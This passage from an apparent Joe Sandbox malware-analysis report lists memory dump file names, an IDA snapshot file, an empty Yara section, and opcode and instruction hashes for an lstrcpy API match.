                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID:
                          • API String ID: 3722407311-0
                          • Opcode ID: 6e2d6273e2b211a95a279f44066238ad409b52d0739490c72eb3a194d8078a04
                          • Instruction ID: b1fb441abbcf29e8763f8f046f7c407d980313a26dd235fd4b6b70042a12416c
                          • Opcode Fuzzy Hash: 6e2d6273e2b211a95a279f44066238ad409b52d0739490c72eb3a194d8078a04
                          • Instruction Fuzzy Hash: 6E11EC75A25B02DBDB249F75D85C926B7F8BF44701748462DA496D3A80EB39F801CB90